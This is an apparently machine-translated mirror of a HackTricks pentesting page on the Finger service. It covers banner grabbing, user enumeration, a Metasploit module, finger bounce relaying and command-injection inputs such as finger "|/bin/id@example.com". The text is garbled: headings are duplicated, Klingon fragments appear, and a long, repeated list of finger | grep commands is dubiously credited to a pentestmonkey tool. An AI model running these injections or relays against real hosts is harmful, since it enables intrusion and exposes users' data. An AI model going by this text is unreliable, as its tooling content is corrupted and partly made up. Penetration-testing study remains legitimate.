Mirrors/hacktricks

Fork 0

mirror of https://github.com/carlospolop/hacktricks synced 2024-11-21 20:23:18 +00:00

Translator workflow b442ae90c4 Translated to Klingon

2024-02-10 17:52:19 +00:00

12 KiB

Raw Permalink Blame History

79 - Pentesting Finger

htARTE (HackTricks AWS Red Team Expert) !HackTricks AWS Red Team Expert!

Other ways to support HackTricks:

If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
Get the official PEASS & HackTricks swag
Discover The PEASS Family, our collection of exclusive NFTs
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Basic Info

The Finger program/service is utilized for retrieving details about computer users. Typically, the information provided includes the user's login name, full name, and, in some cases, additional details. These extra details could encompass the office location and phone number (if available), the time the user logged in, the period of inactivity (idle time), the last instance mail was read by the user, and the contents of the user's plan and project files.

Default port: 79

PORT   STATE SERVICE
79/tcp open  finger

Enumeration

Banner Grabbing/Basic connection

Banner Grabbing/Basic connection (Banner Grabbing/Basic connection)

nc -vn <IP> 79
echo "root" | nc -vn <IP> 79

User enumeration

finger @<Victim>       #List users
finger admin@<Victim>  #Get info of user
finger user@<Victim>   #Get info of user

finger-user-enum from pentestmonkey jImej:

$ finger -l @<target>
$ finger -s @<target>
$ finger -l <username>@<target>
$ finger -s <username>@<target>
$ finger -l <username>@<target> | grep -i "login"
$ finger -s <username>@<target> | grep -i "login"
$ finger -l <username>@<target> | grep -i "shell"
$ finger -s <username>@<target> | grep -i "shell"
$ finger -l <username>@<target> | grep -i "home"
$ finger -s <username>@<target> | grep -i "home"
$ finger -l <username>@<target> | grep -i "name"
$ finger -s <username>@<target> | grep -i "name"
$ finger -l <username>@<target> | grep -i "plan"
$ finger -s <username>@<target> | grep -i "plan"
$ finger -l <username>@<target> | grep -i "project"
$ finger -s <username>@<target> | grep -i "project"
$ finger -l <username>@<target> | grep -i "office"
$ finger -s <username>@<target> | grep -i "office"
$ finger -l <username>@<target> | grep -i "phone"
$ finger -s <username>@<target> | grep -i "phone"
$ finger -l <username>@<target> | grep -i "email"
$ finger -s <username>@<target> | grep -i "email"
$ finger -l <username>@<target> | grep -i "address"
$ finger -s <username>@<target> | grep -i "address"
$ finger -l <username>@<target> | grep -i "info"
$ finger -s <username>@<target> | grep -i "info"
$ finger -l <username>@<target> | grep -i "about"
$ finger -s <username>@<target> | grep -i "about"
$ finger -l <username>@<target> | grep -i "description"
$ finger -s <username>@<target> | grep -i "description"
$ finger -l <username>@<target> | grep -i "bio"
$ finger -s <username>@<target> | grep -i "bio"
$ finger -l <username>@<target> | grep -i "blog"
$ finger -s <username>@<target> | grep -i "blog"
$ finger -l <username>@<target> | grep -i "website"
$ finger -s <username>@<target> | grep -i "website"
$ finger -l <username>@<target> | grep -i "url"
$ finger -s <username>@<target> | grep -i "url"
$ finger -l <username>@<target> | grep -i "web"
$ finger -s <username>@<target> | grep -i "web"
$ finger -l <username>@<target> | grep -i "social"
$ finger -s <username>@<target> | grep -i "social"
$ finger -l <username>@<target> | grep -i "twitter"
$ finger -s <username>@<target> | grep -i "twitter"
$ finger -l <username>@<target> | grep -i "facebook"
$ finger -s <username>@<target> | grep -i "facebook"
$ finger -l <username>@<target> | grep -i "linkedin"
$ finger -s <username>@<target> | grep -i "linkedin"
$ finger -l <username>@<target> | grep -i "instagram"
$ finger -s <username>@<target> | grep -i "instagram"
$ finger -l <username>@<target> | grep -i "github"
$ finger -s <username>@<target> | grep -i "github"
$ finger -l <username>@<target> | grep -i "gitlab"
$ finger -s <username>@<target> | grep -i "gitlab"
$ finger -l <username>@<target> | grep -i "bitbucket"
$ finger -s <username>@<target> | grep -i "bitbucket"
$ finger -l <username>@<target> | grep -i "docker"
$ finger -s <username>@<target> | grep -i "docker"
$ finger -l <username>@<target> | grep -i "aws"
$ finger -s <username>@<target> | grep -i "aws"
$ finger -l <username>@<target> | grep -i "gcp"
$ finger -s <username>@<target> | grep -i "gcp"
$ finger -l <username>@<target> | grep -i "azure"
$ finger -s <username>@<target> | grep -i "azure"
$ finger -l <username>@<target> | grep -i "cloud"
$ finger -s <username>@<target> | grep -i "cloud"
$ finger -l <username>@<target> | grep -i "saas"
$ finger -s <username>@<target> | grep -i "saas"
$ finger -l <username>@<target> | grep -i "paas"
$ finger -s <username>@<target> | grep -i "paas"
$ finger -l <username>@<target> | grep -i "iaas"
$ finger -s <username>@<target> | grep -i "iaas"
$ finger -l <username>@<target> | grep -i "vps"
$ finger -s <username>@<target> | grep -i "vps"
$ finger -l <username>@<target> | grep -i "vpn"
$ finger -s <username>@<target> | grep -i "vpn"
$ finger -l <username>@<target> | grep -i "proxy"
$ finger -s <username>@<target> | grep -i "proxy"
$ finger -l <username>@<target> | grep -i "ssh"
$ finger -s <username>@<target> | grep -i "ssh"
$ finger -l <username>@<target> | grep -i "ftp"
$ finger -s <username>@<target> | grep -i "ftp"
$ finger -l <username>@<target> | grep -i "http"
$ finger -s <username>@<target> | grep -i "http"
$ finger -l <username>@<target> | grep -i "https"
$ finger -s <username>@<target> | grep -i "https"
$ finger -l <username>@<target> | grep -i "smtp"
$ finger -s <username>@<target> | grep -i "smtp"
$ finger -l <username>@<target> | grep -i "pop3"
$ finger -s <username>@<target> | grep -i "pop3"
$ finger -l <username>@<target> | grep -i "imap"
$ finger -s <username>@<target> | grep -i "imap"
$ finger -l <username>@<target> | grep -i "dns"
$ finger -s <username>@<target> | grep -i "dns"
$ finger -l <username>@<target> | grep -i "mysql"
$ finger -s <username>@<target> | grep -i "mysql"
$ finger -l <username>@<target> | grep -i "postgresql"
$ finger -s <username>@<target> | grep -i "postgresql"
$ finger -l <username>@<target> | grep -i "oracle"
$ finger -s <username>@<target> | grep -i "oracle"
$ finger -l <username>@<target> | grep -i "mssql"
$ finger -s <username>@<target> | grep -i "mssql"
$ finger -l <username>@<target> | grep -i "mongodb"
$ finger -s <username>@<target> | grep -i "mongodb"
$ finger -l <username>@<target> | grep -i "redis"
$ finger -s <username>@<target> | grep -i "redis"
$ finger -l <username>@<target> | grep -i "elasticsearch"
$ finger -s <username>@<target> | grep -i "elasticsearch"
$ finger -l <username>@<target> | grep -i "couchdb"
$ finger -s <username>@<target> | grep -i "couchdb"
$ finger -l <username>@<target> | grep -i "cassandra"
$ finger -s <username>@<target> | grep -i "cassandra"
$ finger -l <username>@<target> | grep -i "ftp"
$ finger -s <username>@<target> | grep -i "ftp"
$ finger -l <username>@<target> | grep -i "sftp"
$ finger -s <username>@<target> | grep -i "sftp"
$ finger -l <username>@<target> | grep -i "tftp"
$ finger -s <username>@<target> | grep -i "tftp"
$ finger -l <username>@<target> | grep -i "telnet"
$ finger -s <username>@<target> | grep -i "telnet"
$ finger -l <username>@<target> | grep -i "smtp"
$ finger -s <username>@<target> | grep -i "smtp"
$ finger -l <username>@<target> | grep -i "pop3"
$ finger -s <username>@<target> | grep -i "pop3"
$ finger -l <username>@<target> | grep -i "imap"
$ finger -s <username>@<target> | grep -i "imap"
$ finger -l <username>@<target> | grep -i "dns"
$ finger -s <username>@<target> | grep -i "dns"
$ finger -l <username>@<target> | grep -i "mysql"
$ finger -s <username>@<target> | grep -i "mysql"
$ finger -l <username>@<target> | grep -i "postgresql"
$ finger -s <username>@<target> | grep -i "postgresql"
$ finger -l <username>@<target> | grep -i "oracle"
$ finger -s <username>@<target> | grep -i "oracle"
$ finger -l <username>@<target> | grep -i "mssql"
$ finger -s <username>@<target> | grep -i "mssql"
$ finger -l <username>@<target> | grep -i "mongodb"
$ finger -s <username>@<target> | grep -i "mongodb"
$ finger -l <username>@<target> | grep -i "redis"
$ finger -s <username>@<target> | grep -i "redis"
$ finger -l <username>@<target> | grep -i "elasticsearch"
$ finger -s <username>@<target> | grep -i "elasticsearch"
$ finger -l <username>@<target> | grep -i "couchdb"
$ finger -s <username>@<target> | grep -i "couchdb"
$ finger -l <username>@<target> | grep -i "cassandra"
$ finger -s <username>@<target> | grep -i "cassandra"
$ finger -l <username>@<target> | grep -i "ftp"
$ finger -s <username>@<target> | grep -i "ftp"
$ finger -l <username>@<target> | grep -i "sftp"
$ finger -s <username>@<target> | grep -i "sftp"
$ finger -l <username>@<target> | grep -i "tftp"
$ finger -s <username>@<target> | grep -i "tftp"
$ finger -l <username>@<target> | grep -i "telnet"
$ finger -s <username>@<target> | grep -i "telnet"

finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt

Nmap execute a script for doing using default scripts

Metasploit uses more tricks than Nmap

Nmap execute a script for doing using default scripts

Metasploit uses more tricks than Nmap

use auxiliary/scanner/finger/finger_users

Shodan

port:79 USER

Command execution

Shodan

port:79 USER

Command execution

finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"

Finger Bounce

Use a system as a finger relay

qIj bounce

Use a system as a finger relay

finger user@host@victim
finger @internal@external

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
Get the official PEASS & HackTricks swag
Discover The PEASS Family, our collection of exclusive NFTs
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

12 KiB Raw Permalink Blame History

79 - Pentesting Finger

Basic Info

Enumeration

Banner Grabbing/Basic connection

Banner Grabbing/Basic connection (Banner Grabbing/Basic connection)

User enumeration

Nmap execute a script for doing using default scripts

Metasploit uses more tricks than Nmap

Nmap execute a script for doing using default scripts

Metasploit uses more tricks than Nmap

Shodan

Command execution

Shodan

Command execution

Finger Bounce

qIj bounce

12 KiB

Raw Permalink Blame History